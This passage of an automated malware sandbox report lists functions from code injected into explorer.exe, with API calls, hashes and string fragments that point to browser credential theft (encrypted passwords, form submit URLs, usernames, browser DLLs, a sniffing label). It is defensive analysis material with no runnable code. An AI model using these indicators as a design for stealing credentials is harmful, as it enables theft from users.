                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 407 e90c6b2-e90c6e5 408 e90c705-e90c72d send 407->408 409 e90c6e7-e90c6ff call e90f942 407->409 409->408
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: send
                                                                                                                      • String ID: send
                                                                                                                      • API String ID: 2809346765-2809346765
                                                                                                                      • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                      • Instruction ID: 381a234996a7795c690b67d134d42c0c86e2e87f4140630832cb36e9a7e92ac4
                                                                                                                      • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                      • Instruction Fuzzy Hash: 74011270618A188FDBC4EF1CD048B25B7E0EB98314F5546AED85DCB266C670D8818B85
                                                                                                                      Function 0E90C5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 412 e90c5b2-e90c5ea 413 e90c60a-e90c62b socket 412->413 414 e90c5ec-e90c604 call e90f942 412->414 414->413
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: socket
                                                                                                                      • String ID: sock
                                                                                                                      • API String ID: 98920635-2415254727
                                                                                                                      • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                      • Instruction ID: d6dfbc7fa596ddc9d753a7443731073b271645207895f2199b24dc8341f98a60
                                                                                                                      • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                      • Instruction Fuzzy Hash: 730121706186188FCB84EF5CD048B55BBE0FB59314F1545ADE45EDB266C7B0C9818B86
                                                                                                                      Function 0E9042DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 417 e9042dd-e904320 call e90f942 420 e904326 417->420 421 e9043fa-e90440e 417->421 422 e904328-e904339 SleepEx 420->422 422->422 423 e90433b-e904341 422->423 424 e904343-e904349 423->424 425 e90434b-e904352 423->425 424->425 426 e90435c-e90436a call e90ef12 424->426 427 e904370-e904376 425->427 428 e904354-e90435a 425->428 426->427 429 e9043b7-e9043bd 427->429 430 e904378-e90437e 427->430 428->426 428->427 433 e9043d4-e9043db 429->433 434 e9043bf-e9043cf call e904e72 429->434 430->429 432 e904380-e90438a 430->432 432->429 436 e90438c-e9043b1 call e905432 432->436 433->422 438 e9043e1-e9043f5 call e9040f2 433->438 434->433 436->429 438->422
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3472027048-0
                                                                                                                      • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                      • Instruction ID: b15ab9a17a2b4986ce281910e652daefc7ff0e8cb02e77a0c395f551f0659d48
                                                                                                                      • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                      • Instruction Fuzzy Hash: 58318D70614B09DFDB68EF2980482A5B3A1FB94301F84567ECE2DCB146C730A8A0CFD1
                                                                                                                      Function 0E904412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 453 e904412-e904446 call e90f942 456 e904473-e90447d 453->456 457 e904448-e904472 call e911c9e CreateThread 453->457
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641213519.000000000E8E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E8E0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e8e0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2422867632-0
                                                                                                                      • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                      • Instruction ID: f465a38f2b9184a427a03524674fe9d25d8610ddcb5e811b92ef0809e51eeabc
                                                                                                                      • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                      • Instruction Fuzzy Hash: DBF0FC30368A4C4FD784EF2CD44563AF3D0FBE9214F44053EA54DC3254DA35C9814B15

                                                                                                                      Non-executed Functions

                                                                                                                      Function 0E731D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                                      • API String ID: 0-393284711
                                                                                                                      • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                      • Instruction ID: 3e36088e76734b6d80967b84242bb702187d073f082b93637e979934fe099684
                                                                                                                      • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                      • Instruction Fuzzy Hash: 07E16C70518F488FC7A8EF78C4947AAB7E1FB58301F504A2E959BC7266DF30A941CB85
                                                                                                                      Function 0E734792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                                      • API String ID: 0-2916316912
                                                                                                                      • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                      • Instruction ID: 1ebcbc1d0807ab417adba7694018fd47c3d64b8779a6ba8cae80331b6d788c61
                                                                                                                      • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                      • Instruction Fuzzy Hash: B6B18030518B488EDB59EF68C489ADEB7F1FF58300F50491ED49AC7262EF70A905CB96
                                                                                                                      Function 0E732622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                      • API String ID: 0-1539916866
                                                                                                                      • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                      • Instruction ID: cb33755aca0281df4fb3ab3343c3d92e6200739dc09a4193adee039515082bcb
                                                                                                                      • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                      • Instruction Fuzzy Hash: 8A41D370A18B488FDB58EF9CA4596BD7BF2FB48700F10025ED449D3262DB709D458BD6
                                                                                                                      Function 0E739AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                      • API String ID: 0-355182820
                                                                                                                      • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                      • Instruction ID: 6ebfaf7c235035ec781c2e65c4306bad3da282ab1a2c93d6c257285195dc9a33
                                                                                                                      • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                      • Instruction Fuzzy Hash: A1C15B71618B098FC798EF34C4996DAF3E1FB98304F504B2E959AC7221DF70A915CB86
                                                                                                                      Function 0E739F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                      • API String ID: 0-97273177
                                                                                                                      • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                      • Instruction ID: 69d7fa096f1edfd99ff6fa16b3433be926a8555bcfb95a186fb526afb0477213
                                                                                                                      • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                      • Instruction Fuzzy Hash: 8E51F5315187488FD759DF28D4852AAB7E5FBC5300F601A2EE8CBC7252DBB49906CB82
                                                                                                                      Function 0E7332F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                      • API String ID: 0-639201278
                                                                                                                      • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                      • Instruction ID: c9e90114ed13d30210fd47b7ca02c788f663e561431ed28829fa4b0e725325be
                                                                                                                      • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                      • Instruction Fuzzy Hash: 0BC1B270618A198FC798EF78D459AAAF3E1FB94300FA4472D844AD7266DF30AD01CBC5
                                                                                                                      Function 0E7332F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                      • API String ID: 0-639201278
                                                                                                                      • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                      • Instruction ID: 43eaa306a3c9cba0ec812c5505508f3a9fb0de50c6fb0a7d1c1064bceeeb8334
                                                                                                                      • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                      • Instruction Fuzzy Hash: 2BC1A270618A198FC798EF78D459AAAF3E1FB94300FA5472D844AD7266DF30AD01CBC5
                                                                                                                      Function 0E734CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                      • API String ID: 0-2058692283
                                                                                                                      • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                      • Instruction ID: be2bcf0dfc9257d4107c4d82bcc0e791a250e4c83a2741fefe05a575d791ef3e
                                                                                                                      • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                      • Instruction Fuzzy Hash: 9BA1917061874C8BDB59EFA8D4447EEB7E1FF84300F50462DE48AD7252EF7099458B89
                                                                                                                      Function 0E734CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                      • API String ID: 0-2058692283
                                                                                                                      • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                      • Instruction ID: 4b11a054fb84c12bc717c7a4e2d81510d6ea944119dfb7dc1133740688624dbf
                                                                                                                      • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                      • Instruction Fuzzy Hash: 8491907061874C8BDB59EFA8D444BEEB7E1FF88300F50462EE48AD7252EF7099458B85
                                                                                                                      Function 0E734352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $.$e$n$v
                                                                                                                      • API String ID: 0-1849617553
                                                                                                                      • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                      • Instruction ID: 123b4d9e048fb96b539be062b872d2fc525e031d3e0ac05829efac9a97aac7a8
                                                                                                                      • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                      • Instruction Fuzzy Hash: E3718331A18A4C8FD758EF68C4887AAB7F1FF58304F10062ED45AD7262EB719D458B41
                                                                                                                      Function 0E72FC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                      • API String ID: 0-1970020201
                                                                                                                      • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                      • Instruction ID: a1442d62c27c4102f3c7d8eae8a7579ead3b5b142c73b6385cdca2a563778036
                                                                                                                      • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                      • Instruction Fuzzy Hash: DC515EB0914B4C8FDB54EFA4C045AEEB7F1FF58301F504A2E949AE7255EF3099418B89
                                                                                                                      Function 0E73086F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4$\$dll$ion.$vers
                                                                                                                      • API String ID: 0-1610437797
                                                                                                                      • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                      • Instruction ID: 92f49ce44d6a39717eba17c8a1ace42e815db18e03f722378569eb6106f250be
                                                                                                                      • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                      • Instruction Fuzzy Hash: 5A416230618B4C8FCBA9EF3498557EA73E5FB98301F50462E988EC7251EF30D9458782
                                                                                                                      Function 0E7324B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                      • API String ID: 0-327345718
                                                                                                                      • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                      • Instruction ID: e13935c7902a602bfcbbea176ddf501ac1808662fa5c0f5db14a1da1eadd9b53
                                                                                                                      • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                      • Instruction Fuzzy Hash: 72417730619E4DDFCB94EF7880A47AD77E1FB58300F604669A80ED7262EA70C9409BC6
                                                                                                                      Function 0E730432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .dll$el32$h$kern
                                                                                                                      • API String ID: 0-4264704552
                                                                                                                      • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                      • Instruction ID: 5d2f25836a85ffc5b9c9860b887c3dc05e573ce5f520627e7fb25c874d1e8826
                                                                                                                      • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                      • Instruction Fuzzy Hash: A2418570608B484FD7A9DF3880887AAB7E1FB98301F204B2E949EC3666DB70D945CB41
                                                                                                                      Function 0E7370B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $Snif$f fr$om:
                                                                                                                      • API String ID: 0-3434893486
                                                                                                                      • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                      • Instruction ID: 462bf0394b430058ce2e2fa025bf0300a914096d40bc5af1651955489305314e
                                                                                                                      • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                      • Instruction Fuzzy Hash: 5A31F271518B885FD75AEF38C4886DAB7D4FB84300F60491EE49BD7262EA30A909CA43
                                                                                                                      Function 0E7370C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $Snif$f fr$om:
                                                                                                                      • API String ID: 0-3434893486
                                                                                                                      • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                      • Instruction ID: 9992b093b6a7e07127c5b79e6dca420cfa9011d104fba642dafce13b91947eeb
                                                                                                                      • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                      • Instruction Fuzzy Hash: 7F31B271518B486FD76ADF24C4886DAB7D4FB94300F60491EE49BD7262EA34E9058A43
                                                                                                                      Function 0E732FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .dll$chro$hild$me_c
                                                                                                                      • API String ID: 0-3136806129
                                                                                                                      • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                      • Instruction ID: 12f79a2020f61a17a953c4fad2d22aec26c0321eed9d341fa85e521aabe07369
                                                                                                                      • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                      • Instruction Fuzzy Hash: 03317270118B184FC795EF6894987AAB7E1FB94300FA44A2D944ADB266DF30C905CB92
                                                                                                                      Function 0E732FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .dll$chro$hild$me_c
                                                                                                                      • API String ID: 0-3136806129
                                                                                                                      • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                      • Instruction ID: f6a5b6048f089a5dec7c72de43c28ec9c840b13dd964d9af3e4818692ab6cf49
                                                                                                                      • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                      • Instruction Fuzzy Hash: 20317470118B184FC795EF6894987AAB7E1FF94300FA44A3D944ADB266DF30C905CB92
                                                                                                                      Function 0E7358C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                      • API String ID: 0-319646191
                                                                                                                      • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                      • Instruction ID: 6456afa72e95d0e3ecbac1a31916d06ab847eb8de2e30a0415d0c30cf8ab3457
                                                                                                                      • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                      • Instruction Fuzzy Hash: 1031F130610A5C8BDB45EFB8C8887EDB7E1FB58214F40062AD44EE7251DE788A44C79A
                                                                                                                      Function 0E7358BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                      • API String ID: 0-319646191
                                                                                                                      • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                      • Instruction ID: 0b98b11259a3b8e89157fe7a5b3327574efc63be0d10b70ebcac74d7cb48a9b8
                                                                                                                      • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                      • Instruction Fuzzy Hash: 8B210630A10A5C8BCB45EFB8C8487EDBBE1FF58204F50061AD45AE7261DF748A04CB96
                                                                                                                      Function 0E736E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2641089274.000000000E720000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E720000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_e720000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .$l$l$t
                                                                                                                      • API String ID: 0-168566397
                                                                                                                      • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                      • Instruction ID: 624af3248e5601e759ff205703a41b7c34eafa35e470fac8497d3368a0bb3f65
                                                                                                                      • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                      • Instruction Fuzzy Hash: 11217E70A24A0D9FDB44EFB8D0487ADBAF1FB18300F60462ED009E3611D77499558B94
                                                                                                                      Function 0E736E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
